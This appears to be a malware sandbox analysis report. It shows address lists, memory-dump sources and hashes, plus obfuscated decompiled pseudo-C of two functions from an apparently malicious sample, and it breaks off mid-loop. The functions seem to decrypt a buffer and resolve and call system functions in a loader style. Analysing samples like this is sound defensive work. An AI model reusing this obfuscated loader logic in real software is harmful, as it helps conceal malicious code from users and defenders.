0x002a1d0a
0x002a1d15
0x002a1d17
0x002a1d1a
0x002a1d1d
0x002a1d1f
0x002a1d20
0x002a1d2c
0x002a1d2e
0x002a1d31
0x002a1d31
0x002a1d37
0x002a1d41
0x002a1d42
0x002a1d44
0x002a1d46
0x002a1d47
0x002a1d49
0x002a1d4b
0x002a1d4c
0x002a1d4c
0x002a1d4c
0x002a1d51
0x002a1d59
0x002a1d5d
0x002a1d63
0x002a1d67
0x002a1d6a
0x002a1d70
0x002a1d74
0x002a1d76
0x002a1d7c
0x002a1d7f
0x002a1d85
0x002a1d8d
0x002a1d94
0x002a1d9a
0x002a1d9a
0x002a1da4
0x002a1db1
0x002a1db4
0x002a1dba
0x002a1dc0
0x002a1dc4
0x002a1dc8
0x002a1dcd
0x002a1dd3
0x002a1dd7
0x002a1dda
0x002a1de0
0x002a1de4
0x002a1de5
0x002a1deb
0x002a1df2
0x002a1df8
0x002a1df8
0x002a1dfb
0x002a1e08
0x002a1e0a
0x002a1e11
0x002a1e16
0x002a1e1c
0x002a1e20
0x002a1e22
0x002a1e26
0x002a1e29
0x002a1e33
0x002a1e3c
0x002a1e3d
0x002a1e40
0x002a1e43
0x002a1e49
0x002a1e49
0x002a1e4c
0x002a1e53
0x002a1e59
0x002a1e61
0x002a1e64
0x002a1e6a
0x002a1e6a
0x002a1e6e
0x002a1e74
0x002a1e78
0x002a1e7e
0x002a1e82
0x002a1e88
0x002a1e88
0x002a1e8b
0x002a1e91
0x002a1e98
0x002a1e9e
0x002a1e9e
0x002a1e61
0x002a1eab
0x002a1ead
0x002a1eb5
0x002a1eb7
0x002a1ec1
0x002a1ec5
0x002a1ecb
0x002a1ecb
0x002a1ecf
0x002a1ed5
0x002a1ed5
0x002a1eda
0x002a1ee0
0x002a1ee4
0x002a1ee6
0x002a1eec
0x002a1eef
0x002a1efb
0x002a1f02
0x002a1f08
0x002a1f09
0x002a1f09
0x002a1f11
0x002a1f1e
0x002a1f23
0x002a1f26
0x002a1f2c
0x002a1f33
0x002a1f39
0x002a1f3c
0x002a1f3c
0x002a1f3d
0x002a1f44
0x002a1f47
0x002a1f4e
0x002a1f51
0x002a1f54
0x002a1f5a
0x002a1f61
0x002a1f67
0x002a1f6a
0x002a1f6c
0x002a1f72
0x002a1f76
0x002a1f7e
0x002a1f82
0x002a1f88
0x002a1f8f
0x002a1f95
0x002a1f99
0x002a1fa1
0x002a1fa2
0x002a1fa5
0x002a1fa8
0x002a1fa8
0x002a1fae
0x002a1faf
0x002a1fb5
0x002a1fbf
0x002a1fc8
0x002a1fcb
0x002a1fce
0x002a1fce
0x002a1fd5
0x002a1fdb
0x002a1fdb
0x002a1fde
0x002a1fe4
0x002a1feb
0x002a1ff1
0x002a1ff4
0x002a1ff4
0x002a1ffa
0x002a1973
0x002a1973
0x002a197b
0x002a1985
0x002a1989
0x002a1992
0x002a1996
0x002a199f
0x002a19a3
0x002a19a4
0x002a19ae
0x002a19b9
0x002a19bd
0x002a19be
0x002a19ca
0x002a19d1
0x002a19d7
0x002a19d7
0x002a19df
0x002a19ec
0x002a19f6
0x002a19fa
0x002a1a03
0x002a1a07
0x002a1a0f
0x002a1a19
0x002a1a19
0x002a1a24
0x002a1a28
0x002a1a29
0x002a1a2f
0x002a1a37
0x002a1a3e
0x002a1a44
0x002a1a44
0x002a1a47
0x002a1a4e
0x002a1a52
0x002a1a5b
0x002a1a62
0x002a1a65
0x002a1a71
0x002a1a78
0x002a1a7e
0x002a1a7f
0x002a1a80
0x002a1a88
0x002a1a8f
0x002a1a95
0x002a1a9f
0x002a1aa1
0x002a1aa7
0x002a1aaf
0x002a1ab6
0x002a1abc
0x002a1abc
0x002a1a9f
0x002a1abf
0x002a1ac7
0x002a1aca
0x002a1acd
0x002a1ad3
0x002a1adb
0x002a1ae2
0x002a1af2
0x002a1afe
0x002a1b05
0x002a1b08
0x002a1b10
0x002a1b17
0x002a1b1d
0x002a1b1e
0x002a1b2b
0x002a1b2d
0x002a1b34
0x002a1b37
0x002a1b43
0x002a1b4a
0x002a1b50
0x002a1b51
0x002a1b51
0x002a1b52
0x002a1b5a
0x002a1b61
0x002a1b71
0x002a1b73
0x002a1b79
0x002a1b81
0x002a1b88
0x00000000
0x002a1b8e
0x002a1b71
0x002a1b91
0x002a1b91

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b932141b5672c0b40a06f11913d735f0f9495efb84fabef623221ee9858e0d59
Instruction ID: c91ff4a73bebb1c8c88fca8078ab6af7691ef1d7cbc685c106056a9ff97c1ccb
Opcode Fuzzy Hash: b932141b5672c0b40a06f11913d735f0f9495efb84fabef623221ee9858e0d59
Instruction Fuzzy Hash: CC124C72804218DFEF048F50C9857EEBBF5FF48715F19806EDC49AA146CB781965CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 002A1B95, Relevance: .3, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E002A1B95(signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t190;
				signed int _t192;
				signed int _t193;
				signed int _t197;
				signed int _t198;
				signed int _t201;
				void* _t203;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t217;
				void* _t220;
				signed int _t224;
				int _t226;
				void* _t229;
				signed int _t235;
				signed int _t242;
				signed int _t244;
				signed int _t247;
				signed int _t252;
				signed int _t259;
				signed int _t261;
				void* _t264;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t291;
				signed int _t305;
				signed int* _t314;

				_t275 = __esi;
				_t259 = __edi;
				_t222 = __ecx;
				_t217 = 0x4181a7;
				 *((intOrPtr*)(_t305 + 0x1e)) =  *((intOrPtr*)(_t305 + 0x1e)) + __edx;
				_t190 =  *0x008751C3();
				 *(_t305 - 0x20) = __edx;
				 *0x0083034E =  *0x0083034E & 0x00000000;
				 *0x0083034E =  *0x0083034E | __edx ^  *(_t305 - 0x20) | _t190;
				_t242 =  *(_t305 - 0x20);
				if( *0x00830706 != 0) {
					L6:
					if( *((intOrPtr*)(_t305 - 0x14)) != 2) {
						if( *((intOrPtr*)(_t305 - 0x14)) == 4) {
							 *(_t305 - 0x10) = 1;
							 *(_t305 - 0x18) = 0x55;
							 *(_t305 - 0xc) = 2;
						}
					} else {
						 *(_t305 - 0x10) = 3;
						 *(_t305 - 0x18) = 0x11;
						 *(_t305 - 0xc) = 4;
					}
					_push(_t242);
					 *_t314 =  *_t314 ^ _t242;
					 *(_t305 - 0x20) = _t275;
					_t192 = _t190 & 0x00000000 | _t275 & 0x00000000 ^  *(_t305 - 4);
					_t193 = _t192 /  *(_t305 - 0xc);
					_t244 = _t192 %  *(_t305 - 0xc);
					_push( *(_t305 - 4));
					 *_t314 =  *_t314 - _t244;
					_pop( *_t63);
					 *_t314 =  *(_t305 - 0x20);
					 *(_t305 - 8) = _t244;
					_t281 = 0;
					 *(_t305 - 0x24) = _t244;
					_t283 = _t281 & 0x00000000 ^ (_t244 & 0x00000000 |  *(_t305 + 8));
					_t247 =  *(_t305 - 0x24);
					_push(_t247);
					_t261 = _t259 & 0x00000000 ^ (_t247 & 0x00000000 | _t283);
					_t284 = _t283 - 1;
					 *(_t305 - 0x1c) = 0;
					_push( *(_t305 - 0x1c));
					 *_t314 =  *_t314 + _t217;
					do {
						 *(_t305 - 0x24) = _t217;
						_t224 = _t222 & 0x00000000 ^ (_t217 & 0x00000000 | _t261);
						_t217 =  *(_t305 - 0x24);
						_t222 = _t224 &  *(_t305 - 0x10);
						if(_t222 == 0) {
							_t284 = _t284 + 1;
							 *(_t305 - 0x1c) = _t261;
							_t193 = _t193 & 0x00000000 ^ (_t261 & 0x00000000 |  *(_t305 - 0xc));
							_t261 =  *(_t305 - 0x1c);
							_t217 =  *(_t193 + _t284) & 0x000000ff;
						}
						 *_t314 = _t284;
						_t284 = 0;
						asm("rol edx, cl");
						_t252 = (0 ^  *(_t305 - 0x18)) & _t217;
						asm("lodsb");
						_t193 = _t193 | _t252;
						 *_t261 = _t193;
						_t261 = _t261 + 1;
						_t78 = _t305 - 4;
						 *_t78 =  *(_t305 - 4) - 1;
					} while ( *_t78 != 0);
					_pop(_t220);
					if( *(_t220 + 0x4182ab) == 0) {
						_t81 = _t220 + 0x4181ff; // 0x13001300
						_t314[1] =  *_t81;
						_t235 = _t222;
						_t83 = _t220 + 0x41843c; // 0x6
						_t314[1] =  *_t83;
						_t252 = _t252;
						_t85 = _t220 + 0x418293; // 0x2030408
						 *_t314 =  *_t85;
						_t193 =  *((intOrPtr*)(_t220 + 0x45d040))(_t193, _t305, _t252);
						 *(_t305 - 0x1c) = _t235;
						 *(_t220 + 0x4182ab) =  *(_t220 + 0x4182ab) & 0x00000000;
						 *(_t220 + 0x4182ab) =  *(_t220 + 0x4182ab) ^ _t235 & 0x00000000 ^ _t193;
						_t222 =  *(_t305 - 0x1c);
					}
					if( *(_t220 + 0x4183d4) == 0) {
						if( *(_t220 + 0x418037) == 0) {
							_t96 = _t220 + 0x41816f; // 0x400
							 *_t314 =  *_t96;
							 *_t314 = _t284;
							 *_t314 =  *_t314 & 0x00000000;
							 *_t314 =  *_t314 | _t252;
							_t99 = _t220 + 0x41859f; // 0x400
							_t314[1] =  *_t99;
							_t252 = _t252;
							_t101 = _t220 + 0x41808b; // 0x5000
							_t314[1] =  *_t101;
							_t284 = _t284;
							_t210 =  *((intOrPtr*)(_t220 + 0x45d048))(_t222, _t252, _t220,  *(_t305 - 0x20), _t193);
							 *(_t305 - 0x24) = _t222;
							 *(_t220 + 0x418037) = 0 ^ _t210;
							_t222 =  *(_t305 - 0x24);
						}
						_t193 =  *((intOrPtr*)(_t220 + 0x45d01c))();
						if( *((intOrPtr*)(_t220 + 0x4181f7)) == 0) {
							 *(_t305 - 0x1c) =  *(_t305 - 0x1c) & 0x00000000;
							 *_t314 =  *_t314 | _t193;
							_t112 = _t220 + 0x418438; // 0x4
							_t314[1] =  *_t112;
							_t284 = _t284;
							 *_t314 =  *_t314 & 0x00000000;
							 *_t314 =  *_t314 ^ _t261;
							 *(_t305 - 0x20) = 0;
							 *_t314 = _t314 +  *_t314;
							_push( *((intOrPtr*)(_t220 + 0x45d040))( *(_t305 - 0x20), _t252, _t193,  *(_t305 - 0x1c)));
							_pop( *_t117);
							_push( *(_t305 - 0x20));
							_pop( *_t119);
							_pop(_t193);
						}
						 *_t314 = _t305;
						 *(_t220 + 0x4183d4) = 0 ^ _t193;
						_t305 = 0;
						if( *(_t220 + 0x418450) == 0) {
							_t122 = _t220 + 0x418567; // 0x400
							_t252 =  *_t314;
							 *_t314 =  *_t122;
							_t124 = _t220 + 0x4183bc; // 0x7
							 *_t314 =  *_t124;
							_t126 = _t220 + 0x4180bb; // 0x500
							 *_t314 =  *_t126;
							_t128 = _t220 + 0x418513; // 0x900
							_t305 =  *_t314;
							 *_t314 =  *_t128;
							_t193 =  *((intOrPtr*)(_t220 + 0x45d044))( *_t314, _t284, _t305, _t252);
							 *(_t305 - 0x20) =  *_t314;
							 *(_t220 + 0x418450) = 0 ^ _t193;
							_t284 =  *(_t305 - 0x20);
						}
					}
					_t226 = _t222 & 0x00000000 ^ _t261 & 0x00000000 ^  *(_t305 - 8);
					_t264 = _t261;
					if( *(_t220 + 0x41803b) == 0) {
						 *(_t305 - 0x20) = 0;
						 *_t314 =  *_t314 | _t226;
						_t138 = _t220 + 0x418057; // 0x101b2908
						_t291 =  *_t314;
						 *_t314 =  *_t138;
						_t140 = _t220 + 0x418028; // 0x1
						_t252 =  *_t314;
						 *_t314 =  *_t140;
						_t142 = _t220 + 0x4183e8; // 0x8020304
						_t314[1] =  *_t142;
						_t203 = _t193;
						_t144 = _t220 + 0x4185ef; // 0x101b294d
						 *_t314 =  *_t144;
						_t206 =  *((intOrPtr*)(_t220 + 0x45d044))(_t305, _t252, _t284,  *(_t305 - 0x20));
						 *(_t220 + 0x41803b) =  *(_t220 + 0x41803b) & 0x00000000;
						 *(_t220 + 0x41803b) =  *(_t220 + 0x41803b) ^ _t291 & 0x00000000 ^ _t206;
						_t284 = _t291;
						_t226 = _t203;
					}
					if( *(_t220 + 0x41849f) == 0) {
						if( *(_t220 + 0x41861f) == 0) {
							 *_t314 = _t226;
							_t201 =  *((intOrPtr*)(_t220 + 0x45d01c))( *(_t305 - 0x20));
							 *(_t305 - 0x20) = _t264;
							 *(_t220 + 0x41861f) = 0 ^ _t201;
							_t264 =  *(_t305 - 0x20);
							_pop(_t226);
						}
						 *(_t305 - 0x24) =  *(_t305 - 0x24) & 0x00000000;
						 *_t314 =  *_t314 + _t226;
						_t161 = _t220 + 0x418533; // 0x418533
						 *_t314 =  *_t314 ^ _t305;
						 *_t314 =  *_t314 ^ _t161;
						_t197 =  *((intOrPtr*)(_t220 + 0x45d018))(_t305,  *(_t305 - 0x24));
						 *(_t305 - 0x20) = _t264;
						 *(_t220 + 0x4185cf) = 0 ^ _t197;
						_t264 =  *(_t305 - 0x20);
						_push(_t252);
						_t166 = _t220 + 0x418243; // 0x500
						_t314[1] =  *_t166;
						_t229 = _t226;
						if( *((intOrPtr*)(_t220 + 0x41862b)) == 0) {
							_t169 = _t220 + 0x418414; // 0x4
							_t314[1] =  *_t169;
							_t171 = _t220 + 0x4183cc; // 0x1010101
							_t314[1] =  *_t171;
							_t305 = _t305;
							_push( *((intOrPtr*)(_t220 + 0x45d03c))(_t314, _t197, _t229, _t264));
							_pop( *_t174);
							_push( *(_t305 - 0x20));
							_pop( *_t176);
						}
						_push(_t252);
						_t177 = _t220 + 0x41814b; // 0x300
						 *_t314 =  *_t177;
						if( *((intOrPtr*)(_t220 + 0x41851b)) == 0) {
							 *_t181 =  *((intOrPtr*)(_t220 + 0x45d024))();
							 *_t183 =  *(_t305 - 0x1c);
						}
						_t184 = _t220 + 0x4182a7; // 0x13001300
						_t305 =  *_t314;
						 *_t314 =  *_t184;
						_t198 =  *((intOrPtr*)(_t220 + 0x45d040))();
						 *(_t305 - 0x20) = _t284;
						 *(_t220 + 0x41849f) = 0 ^ _t198;
						_t284 =  *(_t305 - 0x20);
						_t226 = _t305;
					}
					return memcpy(_t264, _t284 + 1, _t226);
				}
				if( *0x0083047E == 0) {
					_push(__ecx);
					 *_t314 =  *_t314 ^ __ecx;
					 *_t314 =  *_t314 ^ __edi;
					_push(__ecx);
					_t222 =  *_t314;
					 *_t314 =  *0x008302CA;
					_push(_t190);
					_push(_t190);
					_t314[1] =  *0x00830266;
					_push( *(_t305 - 0x1c));
					 *_t314 = _t314;
					_t190 =  *0x008751EB();
					 *(_t305 - 0x1c) = __esi;
					 *0x0083047E =  *0x0083047E & 0x00000000;
					 *0x0083047E =  *0x0083047E ^ __esi & 0x00000000 ^ _t190;
					_t275 =  *(_t305 - 0x1c);
				}
				_push(_t222);
				_t314[1] =  *(_t217 + 0x41829f);
				_t214 = _t190;
				if( *(_t217 + 0x41827b) == 0) {
					_t214 =  *((intOrPtr*)(_t217 + 0x45d020))();
					 *(_t217 + 0x41827b) =  *(_t217 + 0x41827b) & 0x00000000;
					 *(_t217 + 0x41827b) =  *(_t217 + 0x41827b) ^ _t275 ^  *_t314 ^ _t214;
					_t275 = _t275;
				}
				_t314[1] =  *(_t217 + 0x4183c8);
				_t275 = _t275;
				 *(_t305 - 0x24) =  *(_t305 - 0x24) & 0x00000000;
				 *_t314 =  *_t314 + _t217;
				_t190 =  *((intOrPtr*)(_t217 + 0x45d040))( *(_t305 - 0x24), _t214);
				 *(_t305 - 0x20) = _t259;
				 *(_t217 + 0x41855f) =  *(_t217 + 0x41855f) & 0x00000000;
				 *(_t217 + 0x41855f) =  *(_t217 + 0x41855f) ^ (_t259 & 0x00000000 | _t190);
				_t259 =  *(_t305 - 0x20);
				goto L6;
			}

0x002a1b95
0x002a1b95
0x002a1b95
0x002a1b95
0x002a1b9a
0x002a1b9d
0x002a1ba3
0x002a1bab
0x002a1bb2
0x002a1bb8
0x002a1bc2
0x002a1c78
0x002a1c7c
0x002a1c99
0x002a1c9b
0x002a1ca2
0x002a1ca9
0x002a1ca9
0x002a1c7e
0x002a1c7e
0x002a1c85
0x002a1c8c
0x002a1c8c
0x002a1cb0
0x002a1cb1
0x002a1cb5
0x002a1cc1
0x002a1cc6
0x002a1cc6
0x002a1cc9
0x002a1ccc
0x002a1ccf
0x002a1cd4
0x002a1cdb
0x002a1cde
0x002a1cdf
0x002a1ceb
0x002a1ced
0x002a1cf0
0x002a1cf9
0x002a1cfc
0x002a1cfd
0x002a1d04
0x002a1d07
0x002a1d0a
0x002a1d0a
0x002a1d15
0x002a1d17
0x002a1d1a
0x002a1d1d
0x002a1d1f
0x002a1d20
0x002a1d2c
0x002a1d2e
0x002a1d31
0x002a1d31
0x002a1d37
0x002a1d41
0x002a1d42
0x002a1d44
0x002a1d46
0x002a1d47
0x002a1d49
0x002a1d4b
0x002a1d4c
0x002a1d4c
0x002a1d4c
0x002a1d51
0x002a1d59
0x002a1d5d
0x002a1d63
0x002a1d67
0x002a1d6a
0x002a1d70
0x002a1d74
0x002a1d76
0x002a1d7c
0x002a1d7f
0x002a1d85
0x002a1d8d
0x002a1d94
0x002a1d9a
0x002a1d9a
0x002a1da4
0x002a1db1
0x002a1db4
0x002a1dba
0x002a1dc0
0x002a1dc4
0x002a1dc8
0x002a1dcd
0x002a1dd3
0x002a1dd7
0x002a1dda
0x002a1de0
0x002a1de4
0x002a1de5
0x002a1deb
0x002a1df2
0x002a1df8
0x002a1df8
0x002a1dfb
0x002a1e08
0x002a1e0a
0x002a1e11
0x002a1e16
0x002a1e1c
0x002a1e20
0x002a1e22
0x002a1e26
0x002a1e29
0x002a1e33
0x002a1e3c
0x002a1e3d
0x002a1e40
0x002a1e43
0x002a1e49
0x002a1e49
0x002a1e4c
0x002a1e53
0x002a1e59
0x002a1e61
0x002a1e64
0x002a1e6a
0x002a1e6a
0x002a1e6e
0x002a1e74
0x002a1e78
0x002a1e7e
0x002a1e82
0x002a1e88
0x002a1e88
0x002a1e8b
0x002a1e91
0x002a1e98
0x002a1e9e
0x002a1e9e
0x002a1e61
0x002a1eab
0x002a1ead
0x002a1eb5
0x002a1eb7
0x002a1ec1
0x002a1ec5
0x002a1ecb
0x002a1ecb
0x002a1ecf
0x002a1ed5
0x002a1ed5
0x002a1eda
0x002a1ee0
0x002a1ee4
0x002a1ee6
0x002a1eec
0x002a1eef
0x002a1efb
0x002a1f02
0x002a1f08
0x002a1f09
0x002a1f09
0x002a1f11
0x002a1f1e
0x002a1f23
0x002a1f26
0x002a1f2c
0x002a1f33
0x002a1f39
0x002a1f3c
0x002a1f3c
0x002a1f3d
0x002a1f44
0x002a1f47
0x002a1f4e
0x002a1f51
0x002a1f54
0x002a1f5a
0x002a1f61
0x002a1f67
0x002a1f6a
0x002a1f6c
0x002a1f72
0x002a1f76
0x002a1f7e
0x002a1f82
0x002a1f88
0x002a1f8f
0x002a1f95
0x002a1f99
0x002a1fa1
0x002a1fa2
0x002a1fa5
0x002a1fa8
0x002a1fa8
0x002a1fae
0x002a1faf
0x002a1fb5
0x002a1fbf
0x002a1fc8
0x002a1fce
0x002a1fce
0x002a1fd5
0x002a1fdb
0x002a1fdb
0x002a1fde
0x002a1fe4
0x002a1feb
0x002a1ff1
0x002a1ff4
0x002a1ff4
0x002a1ffa
0x002a1ffa
0x002a1bcf
0x002a1bd1
0x002a1bd2
0x002a1bd5
0x002a1bd8
0x002a1bdf
0x002a1bdf
0x002a1be2
0x002a1be3
0x002a1bea
0x002a1bef
0x002a1bf2
0x002a1bf5
0x002a1bfb
0x002a1c03
0x002a1c0a
0x002a1c10
0x002a1c10
0x002a1c13
0x002a1c1b
0x002a1c1f
0x002a1c27
0x002a1c29
0x002a1c35
0x002a1c3c
0x002a1c42
0x002a1c42
0x002a1c4b
0x002a1c4f
0x002a1c50
0x002a1c57
0x002a1c5a
0x002a1c60
0x002a1c68
0x002a1c6f
0x002a1c75
0x00000000

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703cbaf3eba3860ab8286c58bd16c8eee8a180dd56076fcb0dfae4dcd8cc0aed
Instruction ID: 27ba2e359336d6751c5582ee929b05b50fbba968f8bb40ebedf24151f7a87d85
Opcode Fuzzy Hash: 703cbaf3eba3860ab8286c58bd16c8eee8a180dd56076fcb0dfae4dcd8cc0aed
Instruction Fuzzy Hash: A5E14D72804614DFEF008F54C9857EEBBB5FF88725F09849EDC48AB146CB781961CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 002A237B, Relevance: .3, Instructions: 291
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002A237B(void* __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t171;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				void* _t184;
				signed int _t186;
				signed int _t187;
				signed int _t190;
				void* _t196;
				signed int _t197;
				signed int _t205;
				signed int _t211;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				signed int _t227;
				void* _t237;
				signed int _t239;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				signed int _t259;
				void* _t262;
				signed int _t263;
				signed int _t265;
				void* _t266;
				void* _t276;
				signed int _t278;
				signed int _t283;
				signed int* _t288;

				_t258 = __esi;
				_t190 = 0x4181d3;
				 *((intOrPtr*)(_t283 + 0x1e)) =  *((intOrPtr*)(_t283 + 0x1e)) + __edx;
				_t171 =  *0x008751F7();
				 *(_t283 - 0x10) = __edx;
				 *0x008303A6 =  *0x008303A6 & 0x00000000;
				 *0x008303A6 =  *0x008303A6 | __edx & 0x00000000 | _t171;
				_t218 =  *(_t283 - 0x10);
				_t243 =  *(__edi + 0x80);
				if( *0x008304FF == 0) {
					_t171 =  *0x008751F3();
					 *(_t283 - 0x10) = _t243;
					 *0x008304FF = _t171;
					_t243 =  *(_t283 - 0x10);
				}
				_t244 = _t243 +  *(_t283 + 8);
				if( *(_t190 + 0x41859b) == 0) {
					_t171 =  *((intOrPtr*)(_t190 + 0x45d024))();
					 *(_t283 - 0x10) = _t258;
					 *(_t190 + 0x41859b) =  *(_t190 + 0x41859b) & 0x00000000;
					 *(_t190 + 0x41859b) =  *(_t190 + 0x41859b) ^ _t258 & 0x00000000 ^ _t171;
					_t263 =  *(_t283 - 0x10);
				}
				do {
					if( *_t244 != 0) {
						 *_t288 = _t171;
						_t259 = 0 ^  *_t244;
						_t171 = 0;
						if( *(_t190 + 0x41816b) == 0) {
							_t288[1] =  *(_t190 + 0x418487);
							_t218 =  *_t288;
							 *_t288 =  *(_t190 + 0x418338);
							_t205 =  *_t288;
							 *_t288 =  *(_t190 + 0x4183ec);
							_t171 =  *((intOrPtr*)(_t190 + 0x45d03c))(_t197, _t218, _t171, _t259);
							 *(_t283 - 0x10) = _t205;
							 *(_t190 + 0x41816b) =  *(_t190 + 0x41816b) & 0x00000000;
							 *(_t190 + 0x41816b) =  *(_t190 + 0x41816b) | _t205 ^  *(_t283 - 0x10) ^ _t171;
							_t197 =  *(_t283 - 0x10);
						}
					} else {
						if( *(_t190 + 0x418420) == 0) {
							_t171 =  *((intOrPtr*)(_t190 + 0x45d024))();
							 *(_t283 - 0x10) = _t197;
							 *(_t190 + 0x418420) = 0 ^ _t171;
							_t197 =  *(_t283 - 0x10);
						}
						 *(_t283 - 0x10) = _t190;
						_t259 = _t263 & 0x00000000 ^ _t190 -  *(_t283 - 0x10) ^  *(_t244 + 0x10);
						_t190 =  *(_t283 - 0x10);
						if( *(_t190 + 0x41812f) == 0) {
							_t35 = _t190 + 0x418033; // 0x700
							_t288[1] =  *_t35;
							_t184 = _t171;
							 *_t288 =  *_t288 & 0x00000000;
							 *_t288 =  *_t288 + _t184;
							_t37 = _t190 + 0x41813b; // 0x300
							_t288[1] =  *_t37;
							_t237 = _t218;
							_t39 = _t190 + 0x4182eb; // 0x500
							_t239 =  *_t288;
							 *_t288 =  *_t39;
							_t171 =  *((intOrPtr*)(_t190 + 0x45d044))(_t237, _t259, _t190, _t171);
							 *(_t190 + 0x41812f) =  *(_t190 + 0x41812f) & 0x00000000;
							 *(_t190 + 0x41812f) =  *(_t190 + 0x41812f) ^ _t239 ^  *_t288 ^ _t171;
							_t218 = _t239;
						}
					}
					_push(_t171);
					_t175 =  *_t288;
					 *_t288 =  *(_t244 + 0x10);
					if( *(_t190 + 0x4185cb) == 0) {
						_t175 =  *((intOrPtr*)(_t190 + 0x45d024))();
						 *_t288 = _t244;
						 *(_t190 + 0x4185cb) = 0 ^ _t175;
						_t244 = 0;
					}
					_pop( *_t66);
					if( *(_t190 + 0x418273) == 0) {
						_t175 =  *((intOrPtr*)(_t190 + 0x45d020))();
						 *_t288 = _t197;
						 *(_t190 + 0x418273) = _t175;
						_t197 = 0;
					}
					_t177 = _t175 & 0x00000000 | _t259 & 0x00000000 ^  *(_t283 + 8);
					_t262 = _t259;
					if( *(_t190 + 0x418203) == 0) {
						 *_t288 =  *_t288 & 0x00000000;
						 *_t288 =  *_t288 | _t177;
						_t187 =  *((intOrPtr*)(_t190 + 0x45d020))();
						 *(_t283 - 0x10) = _t244;
						 *(_t190 + 0x418203) = 0 ^ _t187;
						_t244 =  *(_t283 - 0x10);
						_t177 = _t244;
					}
					 *(_t283 - 0xc) =  *(_t283 - 0xc) + _t177;
					if( *(_t190 + 0x4184ef) == 0) {
						 *_t288 =  *(_t190 + 0x418127);
						_t244 =  *_t288;
						 *_t288 =  *(_t190 + 0x4182f7);
						_t288[1] =  *(_t190 + 0x4185f7);
						_t276 = _t262;
						_t278 =  *_t288;
						 *_t288 =  *(_t190 + 0x41827f);
						_t177 =  *((intOrPtr*)(_t190 + 0x45d048))(_t288, _t276, _t262, _t244, _t197);
						 *(_t190 + 0x4184ef) =  *(_t190 + 0x4184ef) & 0x00000000;
						 *(_t190 + 0x4184ef) =  *(_t190 + 0x4184ef) | _t278 ^  *_t288 | _t177;
						_t262 = _t278;
					}
					 *_t93 =  *((intOrPtr*)(_t244 + 0xc));
					_t196 =  *(_t283 - 0x10);
					if( *(_t190 + 0x418334) == 0) {
						 *_t288 =  *_t288 ^ _t190;
						 *_t288 =  *_t288 + _t196;
						_t211 =  *_t288;
						 *_t288 =  *(_t190 + 0x41838d);
						_t288[1] =  *(_t190 + 0x4185af);
						_t244 = _t244;
						_t283 =  *_t288;
						 *_t288 =  *(_t190 + 0x418410);
						_t177 =  *((intOrPtr*)(_t190 + 0x45d03c))(_t177, _t196, _t190);
						 *(_t283 - 0x10) = _t211;
						 *(_t190 + 0x418334) =  *(_t190 + 0x418334) & 0x00000000;
						 *(_t190 + 0x418334) =  *(_t190 + 0x418334) ^ (_t211 & 0x00000000 | _t177);
						_t196 = _t283;
					}
					_t197 = _t196 +  *(_t283 + 8);
					if( *(_t190 + 0x418474) == 0) {
						 *_t288 =  *_t288 & 0x00000000;
						 *_t288 =  *_t288 + _t197;
						_t177 =  *((intOrPtr*)(_t190 + 0x45d020))();
						 *(_t190 + 0x418474) =  *(_t190 + 0x418474) & 0x00000000;
						 *(_t190 + 0x418474) =  *(_t190 + 0x418474) | _t218 -  *_t288 ^ _t177;
						_t218 = _t218;
						_t197 = _t218;
					}
					_t263 = _t262 +  *(_t283 + 8);
					if( *(_t190 + 0x418020) == 0) {
						 *_t288 =  *_t288 - _t177;
						 *_t288 = _t197;
						 *_t288 =  *(_t190 + 0x418493);
						_t218 =  *_t288;
						 *_t288 =  *(_t190 + 0x418507);
						 *(_t283 - 0x10) =  *(_t283 - 0x10) & 0x00000000;
						 *_t288 =  *_t288 + _t190;
						 *_t288 =  *_t288 & 0x00000000;
						 *_t288 =  *_t288 ^ _t190;
						_t186 =  *((intOrPtr*)(_t190 + 0x45d044))( *(_t283 - 0x10),  *_t288, _t218, _t177);
						 *(_t283 - 0x10) = _t244;
						 *(_t190 + 0x418020) =  *(_t190 + 0x418020) & 0x00000000;
						 *(_t190 + 0x418020) =  *(_t190 + 0x418020) | _t244 ^  *(_t283 - 0x10) | _t186;
						_t244 =  *(_t283 - 0x10);
						_t197 = _t218;
					}
					 *_t288 = _t197;
					_t178 =  *((intOrPtr*)(_t190 + 0x45d00c))( *(_t283 - 0x10));
					 *(_t283 - 8) =  *(_t283 - 8) & 0x00000000;
					 *(_t283 - 8) =  *(_t283 - 8) ^ (_t190 -  *_t288 | _t178);
					_t190 = _t190;
					do {
						if(( *_t263 & 0x80000000) != 0) {
							_t288[1] =  *_t263;
							_t220 = _t218;
							 *_t152 = _t244;
							 *(_t283 - 4) =  *(_t283 - 4) & 0x0000ffff;
						} else {
							 *(_t283 - 0x10) = 0;
							_push( *(_t283 - 0x10));
							 *_t288 =  *_t288 + _t263;
							_t227 = _t218;
							 *(_t283 - 0x10) = _t227;
							 *(_t283 - 4) =  *(_t283 - 4) & 0x00000000;
							 *(_t283 - 4) =  *(_t283 - 4) ^ _t227 ^  *(_t283 - 0x10) ^  *_t263 +  *(_t283 + 8) + 0x00000002;
							_t220 =  *(_t283 - 0x10);
							_pop(_t263);
						}
						 *_t156 =  *(_t283 - 4);
						_t179 =  *(_t283 - 0x10);
						_t288[1] =  *(_t283 - 4);
						_t222 = _t220;
						 *(_t283 - 0x10) = _t222;
